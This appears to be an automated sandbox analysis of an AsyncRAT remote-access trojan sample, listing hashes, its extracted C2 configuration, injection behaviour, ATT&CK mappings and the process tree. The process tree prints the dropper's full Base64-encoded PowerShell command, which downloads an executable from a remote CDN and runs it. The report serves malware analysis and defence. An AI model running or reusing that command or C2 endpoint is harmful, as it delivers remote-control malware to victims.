asyncrat | 7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a

General

Target

7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe
Size

5KB
MD5

9f785803874e569c4309fb73dc109d37
SHA1

6942a4e79d651d6ff8fe9e4fafa6dc48fc5c9ced
SHA256

7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a
SHA512

b69e1189d80f39e29932e8ee07d5ecc37056a04cfb0549c2d61e8dbf1fbb32040412c0da0598ea4095700365aac3d201abaf5aa3c24c3c6d282389863ece00ec
SSDEEP

96:iC79tll3VI2vK8eu2tT+vk+zpCI80vK+/0s7DgGKed3ojgrl:iU9t/33v038vkM4I80vK+/0SAed/

Score

10^/10

asyncrat system guard runtime rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

C2

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/2100-146-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

12 3472 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

asda1.exeasda1.exe

pid process

4908 asda1.exe
4572 asda1.exe

flow	pid	process
12	3472	powershell.exe

pid	process
4908	asda1.exe
4572	asda1.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

asda1.exeasda1.exe

description	pid	process	target process
PID 4908 set thread context of 2100	4908	asda1.exe	RegAsm.exe
PID 4572 set thread context of 1472	4572	asda1.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

3472 powershell.exe
3472 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exeasda1.exeasda1.exe

description pid process

Token: SeDebugPrivilege 3472 powershell.exe
Token: SeDebugPrivilege 4908 asda1.exe
Token: SeDebugPrivilege 4572 asda1.exe

pid	process
3472	powershell.exe
3472	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeDebugPrivilege	4908	asda1.exe
Token: SeDebugPrivilege	4572	asda1.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exepowershell.exeasda1.exeasda1.exe

description	pid	process	target process
PID 3028 wrote to memory of 3472	3028	7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe	powershell.exe
PID 3028 wrote to memory of 3472	3028	7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe	powershell.exe
PID 3472 wrote to memory of 4908	3472	powershell.exe	asda1.exe
PID 3472 wrote to memory of 4908	3472	powershell.exe	asda1.exe
PID 3472 wrote to memory of 4908	3472	powershell.exe	asda1.exe
PID 4908 wrote to memory of 2100	4908	asda1.exe	RegAsm.exe
PID 4908 wrote to memory of 2100	4908	asda1.exe	RegAsm.exe
PID 4908 wrote to memory of 2100	4908	asda1.exe	RegAsm.exe
PID 4908 wrote to memory of 2100	4908	asda1.exe	RegAsm.exe
PID 4908 wrote to memory of 2100	4908	asda1.exe	RegAsm.exe
PID 4908 wrote to memory of 2100	4908	asda1.exe	RegAsm.exe
PID 4908 wrote to memory of 2100	4908	asda1.exe	RegAsm.exe
PID 4908 wrote to memory of 2100	4908	asda1.exe	RegAsm.exe
PID 4572 wrote to memory of 1472	4572	asda1.exe	RegAsm.exe
PID 4572 wrote to memory of 1472	4572	asda1.exe	RegAsm.exe
PID 4572 wrote to memory of 1472	4572	asda1.exe	RegAsm.exe
PID 4572 wrote to memory of 1472	4572	asda1.exe	RegAsm.exe
PID 4572 wrote to memory of 1472	4572	asda1.exe	RegAsm.exe
PID 4572 wrote to memory of 1472	4572	asda1.exe	RegAsm.exe
PID 4572 wrote to memory of 1472	4572	asda1.exe	RegAsm.exe
PID 4572 wrote to memory of 1472	4572	asda1.exe	RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe
"C:\Users\Admin\AppData\Local\Temp\7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcAB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADUAMgAxADUAMwA5ADUAMQAwADYANQAyADIANwAyADYANAAvADEAMAA1ADIAMQA1ADQANQAxADkAMgA1ADUAMAAwADcAMgAzADIALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAGIAeQBnACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgB1AHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdgBzAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBzAGQAYQAxAC4AZQB4AGUAJwApACkAPAAjAGgAYgBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGgAaQBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBmAG0AaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAHMAZABhADEALgBlAHgAZQAnACkAPAAjAHcAbQBkACMAPgA="
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3472

C:\Users\Admin\AppData\Local\Temp\asda1.exe
"C:\Users\Admin\AppData\Local\Temp\asda1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4908

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:2100

C:\Users\Admin\AppData\Local\Temp\asda1.exe
C:\Users\Admin\AppData\Local\Temp\asda1.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4572

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:1472

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\asda1.exe.log
Filesize
902B

MD5
317ed182314a105b8436cfd8bb3879f6

SHA1
aa407b44619a9b06b18d8a39ce27a65b959598e1

SHA256
34a156e5235a27901293bd8928b37d13724d62183e409f6d284110280c56f865

SHA512
27bc617005ef36be6384484e5cec56d7165d1e9535c9a0b5546f1f082cc4bf5969acb573da77171ac7f4119c8cf50a3ced103cd21485569c9cfcf2e340468604

Download Submit
C:\Users\Admin\AppData\Local\Temp\asda1.exe
Filesize
14.7MB

MD5
2cbd5d9d43c5c49f0580975e9e620808

SHA1
17e209b6d6c66882ed78a40d7e0d211760b489a0

SHA256
399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

SHA512
26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

Download Submit
C:\Users\Admin\AppData\Local\Temp\asda1.exe
Filesize
14.7MB

MD5
2cbd5d9d43c5c49f0580975e9e620808

SHA1
17e209b6d6c66882ed78a40d7e0d211760b489a0

SHA256
399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

SHA512
26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

Download Submit
C:\Users\Admin\AppData\Local\Temp\asda1.exe
Filesize
14.7MB

MD5
2cbd5d9d43c5c49f0580975e9e620808

SHA1
17e209b6d6c66882ed78a40d7e0d211760b489a0

SHA256
399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

SHA512
26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

Download Submit
memory/1472-149-0x0000000000000000-mapping.dmp

Download
memory/2100-146-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2100-145-0x0000000000000000-mapping.dmp

Download
memory/3028-135-0x00007FF9F3B20000-0x00007FF9F45E1000-memory.dmp

Filesize
10.8MB

Download
memory/3028-132-0x0000000000010000-0x0000000000018000-memory.dmp

Filesize
32KB

Download
memory/3472-139-0x00007FF9F3B20000-0x00007FF9F45E1000-memory.dmp

Filesize
10.8MB

Download
memory/3472-136-0x00007FF9F3B20000-0x00007FF9F45E1000-memory.dmp

Filesize
10.8MB

Download
memory/3472-134-0x000001AAE81A0000-0x000001AAE81C2000-memory.dmp

Filesize
136KB

Download
memory/3472-133-0x0000000000000000-mapping.dmp

Download
memory/4908-141-0x0000000000CB0000-0x0000000001B60000-memory.dmp

Filesize
14.7MB

Download
memory/4908-142-0x0000000007040000-0x00000000075E4000-memory.dmp

Filesize
5.6MB

Download
memory/4908-143-0x0000000006C30000-0x0000000006CC2000-memory.dmp

Filesize
584KB

Download
memory/4908-144-0x0000000006D80000-0x0000000006E1C000-memory.dmp

Filesize
624KB

Download
memory/4908-137-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads